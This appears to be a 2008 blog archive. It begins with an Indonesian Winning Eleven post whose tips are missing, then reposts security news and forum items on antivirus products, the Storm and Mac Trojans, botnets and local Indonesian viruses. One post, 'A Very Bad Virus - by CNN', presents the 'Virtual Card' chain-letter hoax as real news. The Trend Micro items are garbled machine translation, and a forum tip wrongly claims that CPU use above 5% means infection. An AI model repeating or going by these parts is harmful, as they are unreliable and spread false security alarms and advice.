Bagi pecinta Winnning Eleven pasti sudah mengetahui perbedaan nyata dari kedua winning ini. Baik dari aspek visual maupun dari aspek program permainannya.Saya hanya akan membagi tips dan trik winning eleven yang versi 10 atau 11 pangkat x khususnya dalam cara bertahan menghadapi serangan lawan. Nah berikut ini beberapa trik yang telah saya ketahui.

Sekian dulu tips saya kali ini

Semoga bermanfaat

Haqiqie Suluh

PS: Untuk para Winning Eleven Mania, silahkan bertukar pikiran serta trik di kolom komentar dibawah ini. Jika anda benar benar seorang Mania Winning Eleven, jangan hanya buat kata-kata sampah atau spam, silahkan ajukan dan bagi tips serta trik keahlian Winning eleven anda disini. Seorang Mania hanya jadi Mania kambing jika tidak mau berbagi ilmu karena takut disaingi. Mania Winning harus tidak takut untuk berbagi dengan sesamanya. Jika anda takut kalah karena membagi Tips maka anda bukan seorang Mania Winning Eleven.

Salam untuk para WInning Eleven Mania

SUMBER:WINNING ELEVEN.COM

Killer Download: Top antivirus programs for Windows

2008-07-06T22:47:00.000-07:00

A few years ago, it seemed like we would hear about a new virus threatening to hijack computers around the globe every week. Though it may feel like we're out of the woods these days, it is probably only because many users and companies are now much more aware of potential threats than they used to be. Even computer manufacturers have gotten the message and take more precautions by including some form of pre-installed protection. But when the limitations on these demos run out, it has been my experience that many people just hope for the best because of how little we hear about new threats. Of course, these are the same people who later call me up asking why their computers no longer work.

Even though we don't hear about as many threats in the news, there are just as many viruses out in the wild and some viruses have become even more destructive. At work, your company probably has an antivirus system that protects you from most new strains and an IT department that keeps it updated. At home you are the IT department, and if you want to keep your files safe, you have to remain vigilant.

Fortunately, we have plenty of high quality, free, and low-cost antivirus programs here at CNET Download.com that you can install at home and start using right away. These programs let you scan all the files on your computer along with any you receive in e-mails, on floppy disks and CDs, and (gasp!) from downloads. They also come with auto-updating features so you always have protection from the latest malicious strains.

Don't let the slick interface fool you. Avast is a powerful antivirus application.

(Credit: CNET Networks)

Avast Home Edition, a popular choice for home computer users, offers free virus protection, a futuristic-looking intuitive interface, and regular updates. The on-demand scanner lets you choose specific files and folders for quick scans. While it seems odd to me, Avast is also completely skinnable with several skins to choose from at its site. This is a solid and well-respected (aesthetically pleasing!) program to keep your computer virus-free.

A recently redesigned interface makes AVG incredibly easy to use.

(Credit: CNET Networks)

AVG Anti-Virus Free Edition is an excellent virus protection program for home users. You can schedule full virus scans when you know you'll be away from your computer to make the process painless. I use this one on my home computer and have never had a single problem. I've been thinking about upgrading to the pro version, but haven't gotten around to it yet.

The NOD32 developers recommend an In Depth scan at least once a week.

(Credit: CNET Networks)

NOD32 for Windows is another popular and powerful home virus program that scans for viruses in the background while you work on your computer. This one quietly scans Internet traffic, e-mails, and any floppy disks you may use, keeping viruses and worms away from your system.

Any of these programs are great choices for virus protection from the latest nasty strains. The sooner you get one of these programs, the less chance that the latest virus will infiltrate your system. Got a better antivirus program? Let me know in the comments!

Google Fights Child Porn on Orkut

2008-07-06T22:45:00.000-07:00

BRASILIA (Reuters) - Internet search company Google signed an agreement with Brazilian public prosecutors last week to help combat child pornography on its social networking site Orkut, an accord that the company believes is the first of its kind internationally.

Under the agreement, Google will use filters to remove and prevent illegal content on Orkut, which has about half its users in Brazil. The company will also facilitate evidence gathering under judicial order in suspected crimes against children and teen-agers on Orkut without the need for international legal accords.

Google will also preserve for six months access logs of users being investigated for illegal conduct.

Google said it was the first such agreement that the company had signed and the firm believes it is the first internationally. Alexandre Hohagen, president of Google in Brazil, told a congressional committee, "It's an historic day not only for Brazil but for the Internet in the entire world."

Initially, Google had refused to work with prosecutors, saying it was subject only to U.S. laws, said Prosecutor Sergio Suiama. The company denied this, saying it had always been willing to cooperate with Brazilian authorities.

Brazilian prosecutors say 90 percent of illegal Internet content being investigated in Brazil involves Orkut. The site has 60 million users, half of them in Brazil.

Of 624 investigations by federal prosecutors in Sao Paulo state through the end of last year into human rights crimes on the Internet, 420 involved child pornography on Orkut.

"Orkut was lawless," said Suiama.

The accord was signed during a session of a congressional inquiry into pedophilia and follows legal battles since 2006.

Under the deal, public prosecution withdrew a lawsuit against Google, a company spokesman said.

The committee, which under Brazilian law has some police and judicial powers, ordered the investigation of 18,000 Orkut photo albums accused of harboring child pornography.

Google has more than a 60 percent share of the Web search market, according to industry figures. (pcworld.com)

Top 10 antivirus tools by cnn.com

2008-07-06T22:44:00.000-07:00

IDG) -- Computer viruses are a real threat, and you need a real defense -- an antivirus utility. Here are some of the most useful tools available, including up-to-date definition files that ward off new virus strains. Pick what you need to protect your hard drive from infestation.

MORE COMPUTING INTELLIGENCE
	IDG.net home page
PC World home page
FileWorld find free software fast
Make your PC work harder with these tips
Reviews & in-depth info at IDG.net
		IDG.net's desktop PC page
		IDG.net's portable PC page
IDG.net's Windows software page
IDG.net's personal news page
Questions about computers? Let IDG.net's editors help you
Subscribe to IDG.net's free daily newsletter for computer geniuses(& newbies)
Search IDG.net in 12 languages
News Radio
	Fusion audio primers
	Computerworld Minute

McAfee VirusScan for Windows 95: VirusScan detects all types, including Word and Excel macro viruses, boot-sector infections, and file, multipartite, stealth, polymorphic, and encrypted viruses. (Shareware)
Norton AntiVirus5.0 Windows 95 Trial: Use Norton Antivirus under Windows 95, 98, or NT to keep your system clean and free of infection. (Trial)
McAfee Virus Definition Data Files: These are the current releases of data definition files for McAfee VirusScan products. This update can also be used for Netshield, VShield, WebScan, and several other VirusScan programs. (Free)
Anyware Antivirus: This package protects your computer from known viruses and detects the presence of new ones. It can scan any drive as well as check for viruses in memory, system files, and compressed files. (Free)
Norton AntiVirus Definitions Update: Update your virus definition files with Symantec's intelligent updater. Click the file name to locate and update your program files automatically. (Free)
ViruSafe Web: Whether you use Internet Explorer or Navigator, protect yourself with this Web virus scanner from EliaShim. (Free)
AccessIV Virus Utility: Use this add-in to scan your Access 97 database files for infection by the AccessIV virus. It will check for and disable the virus if it finds it, and it will also fix corrupted databases by deleting infected macros and modules. (Free)
BootProtect 98: Protect your Windows 95 or 98 system from boot-sector viruses using this antivirus tool. When you shut down your PC, BootProtect scans all drives containing a disk and notifies you to remove it. It also detects CD-ROMs and automatically opens the CD drive for you. (Shareware)
McAfee Guard Dog Fix: This fix corrects Guard Dog's File Guardian glitch, which may lock up your system when you try to use Nuts & Bolts 98's DiskMinder, DiskTune, or Image tools. (Free)
ThunderBYTE AntiVirus: Scans and removes known and unknown file, boot-sector, polymorphic, and macro viruses. (Shareware)

Diary of a Deliberately Spammed Housewife

2008-07-06T22:41:00.001-07:00

For Tracy Mooney, a married mother of three in Naperville, Ill., the decision to abandon cyber-sense and invite e-mail spam into her life for a month by participating in a McAfee experiment was a bit of a lark.

The idea of the Spammed Persistently All Month (S.P.A.M.) experiment -- which fittingly started on April Fool's Day -- was to have 50 volunteers from around the world answer every spam message and pop-up ad on their PC.

What would be the experience in 10 countries when everyday people, armed with a PC and e-mail account McAfee provided for the Global S.P.A.M. Diaries project, clicked through the spam and chronicled the results?

Mooney -- who had observed the family's PC crippled just before Christmas by a virus -- was game, especially because McAfee was giving a free PC to all participants. She was selected to be among the 50 volunteers picked by McAfee out of 2,000 people who applied to be part of the adventure.

By the time it was all over, after every bank-account phishing scam, Nigerian bank scheme, and offer for medication, adult content and just plain free stuff had been pursued. "I was horrified," says Mooney, a realtor by profession. "It's all snake oil. I'm amazed at what true junk is out there when you're clicking through on e-mail."

McAfee is releasing the results Tuesday of its free-wheeling month-long S.P.A.M. experiment, done largely to illustrate -- if you didn't know already -- how spam is connected to malware and criminal activity, not to mention some of the slimiest marketing ever devised. (Compare antispam products.)

Each S.P.A.M. volunteer saw an average of 70 spam messages arrive in their in-box each day, with men receiving about 15 more per day than women. That was a lot to answer, but "Penelope Retch" -- the alias that Mooney chose for her S.P.A.M. adventure -- answered every single message.

In her guise as Penelope Retch, Mooney answered the e-mail that came into her account. "I'd see an interactive spam, open it, click on it and asked to be removed. That would only make it worse," she says. "They'd say 'no.'"

Whether trying to win an iPod online, get free travel brochures, weight-loss tea or Maybelline eyeliner, the effect of entering a home address was extreme. Immediately, a deluge of mail landed at her doorstep, directed to the attention of Penelope Retch.

"One of the mail offers I got was a $7,500 credit card for Penelope Retch," Mooney says, noting that the sudden upsurge in junk mail left the neighborhood postman somewhat aghast. "It grew exponentially, so I stopped giving out my home address," she says, adding, "I am concerned about the environment."

Mooney clicked through on the phishing e-mails for fake Wells Fargo and other bank sites, sat back as the supposed government of Nigeria sought to give her an inheritance, and watched a foreign IP address go after a dummy PayPal account that had been set up as part of the S.P.A.M. experiment.

Overall, the most obvious result of the S.P.A.M. experiment was that the PC that McAfee had provided for the project noticeably slowed down, clogged up with spyware, Mooney says.

According to McAfee, which selected five participants from each of 10 countries for the S.P.A.M. experiment, the five U.S. participants received the most spam: 23,233 messages over the course of the month.

Brazil and Italy were in the 15,000-plus category, and Mexico and United Kingdom above 10,000. Australia, The Netherlands and Spain were in the 5,000 to 9,000-plus spam range. The S.P.A.M. volunteers in France and Germany got the least, less than 3,000 for the month. McAfee didn't even include what it calls "grey mail" (e-mail that arrived after participants signed up for a newsletter, for example) in this count.

Phishing e-mail accounted for 22% of the spam received by the Italian volunteers and 18% of the U.S. ones. In general, spam appears to still largely be delivered in English; French- and German-language spam were the only non-English spam to amount to more than 10% of spam received by the participants in France and Germany respectively.

Some oddball facts that emerged from the experiment are that fake Chase.com was the most common phishing e-mail spotted during the project, and that the British volunteers received the most Nigerian scam e-mail.

In addition to Mooney, the other S.P.A.M. participants also kept a blog about the experience, which some found amusing and others disturbing. One participant in Australia named Marika wrote, "I don't know whether I would feel safe to surf to that extent again. I tried to sign up for jobs that would generate an at-home income with what seemed like respectable sites, however these sites led to massive amounts of spam."

Trojan Poses as July 4th Video

2008-07-06T22:39:00.000-07:00

As predicted, hackers tried to trick users into downloading the Storm bot Trojan Friday by unleashing a flood of Fourth of July spam bearing links to malicious sites, several security companies reported.

The spam campaign, anticipated earlier in the week by MX Logic Inc. , used messages with subject headings ranging from "Amazing firework 2008" and "Celebrating Fourth of July" to "Light up the sky" and "Spectacular fireworks show," said U.K.-based Sophos Plc. in an alert posted to the Web Friday.

Links in the spam led to hacker-controlled sites that trumpeted a video clip worth downloading. "Colorful Independence Day events have already started throughout the country," the malicious sites claimed. "The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it."

The file pitched to users was an executable: "fireworks.exe."

Users who agreed to the download didn't receive a video, but instead infected their Windows-running PCs with the Storm Trojan horse, which hijacked the system and added it to the existing collection of compromised computers making up the Storm botnet.

"You're not going to be feeling in the mood for celebrations if this malware infects your PC," said Graham Cluley , a Sophos senior technology consultant, in a statement.

Security researchers at F-Secure Corp. , the SANS Institute's Internet Storm Center (ISC) and Trend Micro Inc. also reported the Storm spam and infection attempts.

Storm's backers have regularly used holiday-themed spam to dupe users into downloading the Trojan and self-infecting their PCs. Last year , the bot was behind a massive surge in spam during July, and it has been linked to campaigns around Christmas and New Year's .

Earlier this year, Microsoft Corp. researchers said that their company's Malicious Software Removal Tool (MSRT) had beaten Storm into submission, a claim contested by third-party security experts.

Top 10 Virus, Juni 2008

2008-07-06T22:38:00.000-07:00

Virus lokal urutan pertama masih ditempati oleh Amburadul. Sementara di posisi kedua dan ketiga hanya terjadi pertukaran tempat antara virus Bluevhentexi dan Euis. Memang pada periode ini dirasakan tingkat penyebaran virus jenis VBScript sudah mulai menurun, terbukti hanya satu virus VBScript saja yang masuk dalam 10 besar virus kali ini. Berikut daftar selengkapnya:

1. Amburadul
Virus yang hadir dengan lambang menyerupai icon default untuk file gambar ini, akan membuat direktori baru untuk menaruh file - file induknya dengan nama ~A~m~B~u~R~a~D~u~L~² yang berada di bawah direktori System32 Windows. Nama file induk virus juga dibuat menyerupai file system Windows seperti csrss.exe, lsass.exe, winlogon.exe dan lain sebagainya. Dalam aksinya, ia akan membuat file duplikat atas dirinya pada root drive, misalnya dengan nama Friendster Community.exe, J3MbataN K4HaYan.exe, MyImages.exe, dan banyak nama file lainnya terutama yang berbau pornografi untuk menarik perhatian user. Untuk memberitahu kehadirannya, virus ini pun akan menampilkan pesannya pada caption di Internet Explorer. Dan hati-hati, karena ia dapat menghapus file gambar dan video yang Anda miliki. Beberapa extension file yang terbukti ia hapus adalah TIF, AVI, MP4, WMV, MPG, MPEG, VBS, dan EML.

2. Blueventhexi
Virus lokal yang satu ini memiliki ukuran file sebesar 36.864 bytes, tanpa di-packing. Dibuat menggunakan Visual Basic, dan menggunakan icon yang mirip seperti icon folder standar bawaan Windows. Sekilas, virus ini ada kesamaan dengan virus BlueFantasy. Pada komputer terinfeksi, Windows akan menampilkan pesan dari sang virus saat memulai Windows. Pesan tersebut juga bisa Anda temukan pada folder StartUp dengan nama “BluVenTheXi 10 Mei 2008 Surabaya.txt”.

3. Euis
Virus yang di-compilecompress. Pada komputer terinfeksi, virus ini akan menampilkan pesannya di awal. Ia juga akan menghilangkan beberapa menu dari Start Menu, memblokir akses ke beberapa tools Windows seperti Task Manager, Regedit, Folder Options, dan juga mencoba untuk menyingkirkan antivirus yang kemungkinan terpasang di komputer korban. Diketahui, virus ini pun dapat menginfeksi file executable lainnya dengan cara menaruh file yang diinfeksi di bawah tubuhnya. menggunakan Visual Basic ini memiliki ukuran file yang terbilang sangat besar, yakni sekitar 3,4Mb tanpa di-

4. Ninta
Virus lokal yang menggunakan icon mirip file aplikasi Microsoft Word ini dibuat menggunakan Visual Basic. Ia memiliki ukuran tubuh sekitar 53.248 bytes tanpa di-packer. Saat komputer terinfeksi oleh virus ini, pada direktori System32 akan terdapat sebuah direktori baru lagi dengan nama F41 yang sebenarnya ber-attribut hidden. Pada direktori tersebut akan terdapat 2 buah file, yang pertama svchost.exe yang tak lain merupakan file induk virus, dan satu lagi adalah file MSVBVM60.dll. Kedua file ini juga dengan attribut hidden. Ia juga akan mencoba membuat file autorun.inf dan explorer.exe di setiap drive dan akan mem-blok akses ke Command Prompt, Find/Search, dan beberapa aplikasi lainnya yang memiliki caption seperti Process Viewer.

5. Scootr

Virus ini dibuat menggunakan Visual Basic dengan icon menyerupai gambar folder. Ia memiliki ukuran file sebesar 159.744 tanpa di-compress. Jika dilihat sekilas ada beberapa kemiripan dengan virus Aksika, kemungkinan memang varian atau hasil modifikasi. Pada komputer terinfeksi, pada root directory akan terdapat file Puisi.txt yang merupakan pesan dari si pembuat virus. Jika PCMAV tidak bisa running sebagaimana mestinya, coba rename terlebih dahulu filenya agar tidak di-blok oleh virusnya.

6. Quick
Virus berlambangkan mirip file video ini memiliki ukuran tubuh yang cukup kecil, yakni 19.456 bytes, dalam keadaan terkompresi menggunakan UPX. Pada komputer terinfeksi, di root drive system (C:) akan terdapat file induk virus dengan nama seperti ccinfo.exe, readme.txt, version.sys, windriver.exe, stba_cihampelas.3gp.exe, 3gp.sys, dan masih banyak lagi yang lainnya.

7. Valeria
Virus yang dibuat menggunakan Visual Basic ini berukuran 143.360 bytes, murni tanpa di-compress. Virus yang dikenal menggunakan icon mirip folder ini terkadang menampakan iconnya pada system tray Windows. Pada komputer terinfeksi, akan terdapat file Msoffice.exe di folder StartUp yang ada di Start Menu.

8. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.

9. Joniezz
Virus berlambang mirip file dokumen Microsoft Word ini dibuat menggunakan Visual Basic. File induknya yang memiliki ukuran sebesar akan terdapat di direktori \System32\LoLOxz dengan nama smss.exe. Ia akan mencoba mengubah Registry dengan menonaktifkan fungsi Find/Search Windows serta Command Prompt. Ia juga akan membaca setiap program yang berjalan, apabila ditemukan program yang mengancam kelangsungan hidupnya seperi misalnya Process Explorer, maka akan segera ia bunuh. Ia pun tidak lupa membuat file autorun.inf pada beberapa drive agar mempermudahnya aktif dan menyebarkan diri.

10. Novi.vbs
Virus lokal jenis VBScript ini memiliki ukuran file sebesar 3698 bytes. Jika flash disk Anda terinfeksi, maka akan terdapat file NOVI.dll.vbs dan autorun.inf di root flash disk tersebut. Dan ia pun menampakan kehadirannya melalui caption Internet Explorer yang bertuliskan “Hacked by Novi PW”.

Security Firm Reports Trojan Targets Macs

2008-07-06T22:34:00.000-07:00

Security researchers reported recently that they have spotted a Mac Trojan horse in the wild that could compromise machines running Apple Inc.'s Mac OS X 10.4 or 10.5.

Last week, SecureMac, a Mac-specific vendor of antivirus tools, posted an alert saying that its researchers had found a Trojan horse, dubbed "AppleScript.THT," being distributed from a hacker-operated site where discussions of spreading the malware via iChat, Apple's instant messaging and video chat software, were also taking place.

The company classified the threat posed by the Trojan as "critical."

The malware exploits a recently publicized vulnerability in the Apple Remote Desktop Agent (ARDAgent), part of Tiger's and Leopard's Remote Management component. Composed as a compiled AppleScript, or in another variant, script bundled into an application, the Trojan leverages the ARDAgent bug to gain full control of the victimized Mac.

"[It] allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging," claimed SecureMac. "Additionally, the Trojan can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing."

SecureMac's warning came one day after an anonymous reader disclosed a few details of the ARDAgent vulnerability on Slashdot, and on the same day that rival security vendor Intego provided more information about the bug.

Malicious AppleScript, said Intego, can call ARDAgent, which then gives that script full "root" access to the system. "When an application enables a root privilege escalation of this type, any malicious code that is run may have devastating effects. These may range from deleting all the files on the Mac to more pernicious attacks such as changing system settings and even setting up periodic tasks to perform them repeatedly," Intego's warning read.

Like any Trojan horse, AppleScript.THT does not spread on its own but relies on user actions, such as downloading and launching, to infect a machine. Trojans can also be silently introduced on a computer if it's injected after a successful attack using another vulnerability, such as a browser bug.

Some researchers downplayed the threat. Thomas Ptacek of Matasano Security LLC, a New York-based security consultancy, said the ARDAgent vulnerability wasn't much of a concern.

"Who cares if someone busts root on your Mac?" Ptacek said in a Thursday entry on the Matasano blog. "It's a single-user system. I'll let you in on a Matasano state secret: if you break [my user] account, I'm in trouble. If you're malware and just trying to spread, or redirect my browser to phishing pages, you're wasting your time with this 'root' silliness."

Ptacek and others have noted that users can protect themselves by removing ARDAgent from its normal location, which is System/Library/CoreServices/RemoteManagement, and archiving the application.

Malware is Getting Smarter, F-Secure Warns

2008-07-06T22:33:00.000-07:00

Watch out for the newest generation of malware that is difficult to crack and efficient, warns antivirus firm F-Secure.

The Finnish firm has warned that today's malware is characterized by the packing, encryption, and obfuscation of existing families of Trojans, backdoors, exploits, and other threats, which is now done with industrial efficiency.

What the increasing use of self-defense technologies in malware represents is the ever growing professionalism within the crime-ware community, according to F-Secure.

In its data security summary on the first half of the year, the firm noted that there have been a growing number of targeted malware attacks on individuals, companies, and organizations.

Targeted Attacks

In a targeted malware attack, the attacker profiles his victim and sends an e-mail using the recipient's name, title, and perhaps references to his job function. The message's content is typically something that the recipient would expect to receive via e-mail.

"I have a nasty feeling that the situation is getting worse, not better", said Mikko

Hyppönen, Chief Research Officer at F-Secure Corporation. "However, we're not giving up either."

Targeted malware attacks are also being used for political and military motives, pointed out F-Secure. During the recent clashes between Tibetans and the Chinese military, the battles on the streets were accompanied by political espionage on the Internet. Human rights groups, pro-Tibet organizations and individuals supporting the freedom of Tibet were attacked with a carefully targeted and technically advanced e-mail campaign that attempted to infect their computers in order to spy on their actions.

Malware, Spam, and other Net Pests Rev Up

2008-07-06T22:32:00.000-07:00

The spam and malware tsunami continues to cast a mounting shadow over the Internet.

An announcement from F-Secure warned that malware is growing faster than ever before, while Marshal's TRACE team claims that the volume of malicious spam in circulation has more than tripled in one week.

Marshal fingered the Srizbi botnet as the chief culprit, currently responsible for 46 percent of all spam sent, helping malicious spam figures jump from 3 to almost 10 percent of all spam traffic so far in June.

The TRACE team lead threat analyst, Phil Hay, said that Srizbi's criminal controllers are currently on a major expansion drive.

Srizbi is duping recipients by including the first part of their e-mail address in the subject line with the suggestion that they look "stupid" in a video, luring them to a Web site to view the video where they are exposed to malware.

Marshal said Srizbi is also targeting social networking sites like Classmate.com, luring victims to dodgy sites with the promise of messages from long lost school friends. A Flash video player link is presented to the victim, which downloads an executable file that infects their computer.

"This kind of social engineering tactic is nothing new," said Hay.

"What is significant is the rapid increase in the volume. It once again demonstrates the incredible power and dominance that the major spamming botnets have over email traffic. Very few legitimate businesses could triple their e-mail capacity at the push of a button. But this is the advantage that the illegal control of thousands of computers gives the spammers. "We see Srizbi as one of the biggest threats to Internet users today. Users should be wary of emails that make personal offers such as online friend connections or include inflammatory personalized subjects such as 'you look stupid in this video', particularly if they don't recognize the sender," he said.

According to F-Secure's security summary for the first half of 2008, the unprecedented growth in malware is due to the packing, encryption, and obfuscation of existing families of trojans, backdoors, exploits and other threats now being done with "industrial efficiency".

The number of malware detections has grown by almost half a million since the end of the year, jumping from 500,000 total detections to 900,000.

"I have a nasty feeling that the situation is getting worse, not better", says Mikko Hypponen, chief research officer for the security vendor.

F-Secure cited targeted malware attacks such as the classmates.com con that Marshal reported as key growth areas for dodgy software peddlers over the past six months.

Targeted malware attacks typically involve the attacker profiling their victim and sending an e-mail using the recipients name, title, job function and a subject field related to the victim's position in order to trick them into opening something they would normally expect to receive via e-mail.

Targeted malware attacks against political or military organizations also increased, such as an e-mail attack against human rights and pro freedom of Tibet groups that aimed to install malware on their PCs that would allow their political opposition to spy on their actions.

F-Secure's half-yearly security summary also looked at emerging mobile phone threats such as Jailbreaking, growth in SQL injection attacks, and the risks emerging around third party applications like Adobe Flash.

Top 9 Windows Antivirus

2008-07-06T22:23:00.000-07:00

Antivirus software is must-have protection. This review picks the best antivirus software based on its virus detection abilities, features, and breadth of protection. Whether you're seeking total system coverage or an ala carte solution, each of the following products provides superb virus protection for Windows-based PCs. Because every system is unique, evaluate several of these antivirus products to find the software best suited for your PC and your level of experience.

1. Avira AntiVir PersonalEdition Premium

AntiVir is a consistent leader in independent antivirus tests. Avira's AntiVir PersonalEdition Premium is a low-impact, easy to use virus scanner that also includes rootkit detection and phishing protection. Five euros of each purchase is automatically donated to the Auerbach Foundation, a non-profit that supports various charity and community-related services. AntiVir PersonalEdition Premium should be used in conjunction with a firewall.

Buy Direct

2. Kaspersky Anti-Virus Personal

Kaspersky Anti-Virus Personal offers excellent antivirus protection, perhaps unsurpassed in its ability to unpack and scan compressed files - something that trips up a lot of other vendors. Should be used in conjunction with a firewall.

3. BitDefender Antivirus Plus

Softwin's BitDefender Professional protects against viruses, spyware, and instant messaging threats, as well as offering firewall rules to block undesirable traffic and a privacy gateway to keep your identity and preferences private while surfing the Internet.

4. McAfee VirusScan Plus

McAfee VirusScan Plus is an ideal candidate for those seeking an antivirus/firewall combination without all the bloat of traditional Internet security suites. McAfee VirusScan Plus makes an easy job of removing adware and spyware, something not all antivirus products deliver.

5. Panda Antivirus 2007

Panda Antivirus 2007 combines antivirus, antispyware, and antiphishing with its highly touted behavior-based TruPrevent Technology. License covers use on two computers and includes free tech support via email (telephone support options are also available).

Read Review

6. F-PROT Antivirus

F-PROT Antivirus for Windows offers a feature that's increasingly harder to find - it includes a command-line scanner that can be used to create a rescue CD for scanning the system in Safe Mode. This is a particularly effective way to remove stubborn resuscitators. Firewall not included.

Buy Direct

7. G Data AntiVirusKit (AVK)

AntiVirusKit (AVK) provides a double layer of protection, bundling two of the best antivirus engines - Kaspersky and BitDefender - under a single, easy-to-use console. Like Nod32, you'll also want to bolster G Data's AVK with a firewall.

Buy Direct Read Review

8. AVG Anti-Malware

AVG Anti-Malware combines traditional virus protection with adware and spyware scanning, in a low impact footprint ideal for resource-strained PCs or those who just want the best performance possible out of their computers. Free tech support is available via email and the standard license includes two years of protection. Should be used in conjunction with a firewall.

Buy Direct

9. Eset Nod32

Nod32 features a small footprint, low performance hit, and fast scan speeds, providing focused virus protection ideal for gamers or those with an older PC. Should be used in conjunction with a firewall.

New Virus Alert! - Especially for those MSN messenger users

2008-07-06T21:32:00.001-07:00

Watch out MSN users! There is a new virus... Maybe its old... But once it get into your computer, it automatically sends a copy of the virus to all your contacts via MSN messenger... I almost got hit by one, but norton stopped it! There are many different names it is hiding under... My friend's computer sent me "The cat and the fan" It sented another copy to my other friend... She got "The frog and the fish" There are many combinations... So be careful!

Sorry to double post, but I found yet another one... "Mona Lisa wants her smile back" Its another virus!

------------------
No problem - merged
m^e

A Very Bad Virus - by CNN

2008-07-06T21:29:00.000-07:00

A new virus has just been discovered that has been classified by
Microsoft as the most destructive ever
This virus was discovered yesterday afternoon by McAfee and
no vaccine has yet ! been developed.
This virus simply destroys Sector Zero from the hard disk,
where vital information for its functioning are stored.
This virus acts in the following manner:
It sends itself automatically to all contacts on your list with the title
"A Card for You".
As soon as the supposed virtual card is opened the
computer
freezes
so that the user has to reboot.
When the ctrl+alt+del keys or the reset button are pressed,
the virus destroys Sector Zero, thus permanently destroying the
hard
disk.
Yesterday in just a few hours this virus caused panic in New York,
according to news broadcast by CNN.
This alert was received by an employee of Microsoft itself.
So don't open any mails with subject: "A Virtual Card for You."
As soon as
you get the mail, delete it!!
Even if you know the sender !!!

Trend Micron Virus-update Creates Massive Problems

2008-07-06T21:27:00.000-07:00

An imperfection of update for softwares antivirus of the company of Trend security Micron caused the slowness or interruption in the operations of some computers around of the world, confirmed the company in this Monday (25/04). For return of 2h of this monday in Tokyo, the Trend Micron had received about 311,9 a thousand telephonic calls users in Japan declaring that its PCs had been afectados for a deficient filing-cabinet with information on virus and plagues. The filing-cabinet of data was placed online between 7h30 and 9h02 (hourly Japanese) of Saturday (23/04). A problem in the archive 2,594,00 OPR - Official Pattern Release - created a canal that sucked all or almost all the energy of a PC for the data processing. The company that uses Windows XP Service Pack 2 (SP2), of the Microsoft, and OfficeScan software had been afectadas, of the Trend, and also domestic users with the SP2 and software PC-cillin InterNet Security 2005 Virus Buster. "the problem was caused by our proper laboratories of virus in Manila [ Phillipino ] during the checagem process, when part of the test was not executed", the spokesman of the Trend Naomi Ikenomoto declared. The defective filing-cabinet was substituted to 10h51, schedule of Japan. Version 2.596.00 of the OPR will finish automatically with the problem in the PCs that to make download, according to company. The majority of the afectados computers is located in Japan, even so the Trend has received some reports from problems in Australia, Middle East and Europe. Customers of the United States had also had problems. The Trend Micron still is to evaluate will become an announcement on measures that goes to apply to compensate the afected users.

New Sober Virus

2008-07-06T21:26:00.000-07:00

The Trend Micron launched alert on the appearance of a new version of the celebrity virus Sober, arriving of this form at the variant S and that already it received the classification from being as a threat of average risk. This plague, is to spread quickly in Germany and the United States, and dissimulates to be an official message of the FIFA on the championship of World to carry through in 2006 in Germany. The contaminated email arrives at the user with an annexed malicious filing-cabinet where it is promised as being carrying of information on the Championship of the World and for such the user will have that to supply to a name of user and password that supposedly he would have to come in the attached filing-cabinet. After the execution of the filing-cabinet, the Sober.S is installed in the machine and exactly creates copies of itself in diverse folders of the system, besides searching the record in search of email addresses to continue its terrivel propagation. The Trend Micron recommends thus that all the users do not open strange messages e, above of everything, keeps softwares always actualizados antiviruses. To enhance the fact of virus Sober.S to only attack the operative systems Windows, of the Microsoft.

Virus Alert (hoax)

2008-07-06T21:13:00.001-07:00

Recently a new virus was discovered that was classified by MICROSOFT www.microsoft.com and by MCAFEE www.mcafee.com to be the most damaging of all time! This virus was discovered by MCAFEE and still there is no development of a vaccine!

This virus simply writes zeros on the hard drive, where the vital information for the operation of the PC is kept. The virus activates in the following manner:

1. By email it is received with the title 'A VIRTUAL CARD FOR YOU', when opening the message, it sends itself to all in the address list soon...

2. It hangs the machine, forcing the user to reboot the system.

3. AT the moment in which the keys ctrl+alt+del or the RESET button is pressed, it writes zeros to the hard drive making it unusable forever.

By the previous information, please, take precaution with the use of electronic mail and, of course, if you receive an email which you do not know the origin of, simply delete it without opening.

Please, send this message to the most people possible!!!!

In a few hours yesterday, this virus caused panic in New York, according to CNN www.cnn.com.

whatch out !

Aim Virus Messing Around With My C:\windows Folder

2008-07-06T21:11:00.000-07:00

Okay, so I was talking to my friend on IM yesterday and then she sends me a message saying OMFG LOOK AT HER or something like that and then a link. I stupidly opened it and then two seconds later she IMs me telling me not to cause it seems to be a virus. Usually I don't accept those kind of things but it was from her so I let my guard down. Apparently she had got it from another one of her friends.

It's a .pif virus I know that much but it doesn't do much, I can still open AIM and my task manager with no weird things but when I reboot my computer, my C:\WINDOWS folder pops up at the startup for no reason at all. Then when I x out of the window, I can't find that system folder anymore but according to Norton and Spybot, the folder isn't missing. I rebooted again and saw nothing really missing but I don't know. Anything to do with that folder makes me paranoid. Help me please?

Ranking Virus

2008-07-06T20:56:00.001-07:00

According to TrendMicro NETSKY was the most affective virus of June

here the ranking

1. Worm_Netsky.P
2. HTML_Netsky.P
3. Java_Bytever.A
4. Worm_Sober.S
5. TSPY_Small.SN
6. SPYM_Gator
7. SPYM_Dashbar.300
8. Troj_Dyfuca.I
9. Worm_Netsky.D
10. SPYW_Websearch.A

Music Video Web Site W/ Virus

2008-07-06T20:55:00.000-07:00

[FONT=Arial] If you are looking to put a music video in your MySpace or what ever you choose avoid using the site www.musicfeet.com

This web site gives you a Trojan virus each time you access this site. So if you have a good virus scan and firewall dont go there

How To Know If You Have A Virus Or Trojan/spyware

2008-07-06T20:54:00.000-07:00

How to know if you have a virus or trojan or spyware in xp open task manager by presing ctrl+alt+del an close all applacations now look at your cpu usage if it is above 4-5% you have a problem.

Microsoft in an e-mail Tuesday warned users to update their antivirus protections against the Kama Sutra worm, the mass-mailing virus slated to begin

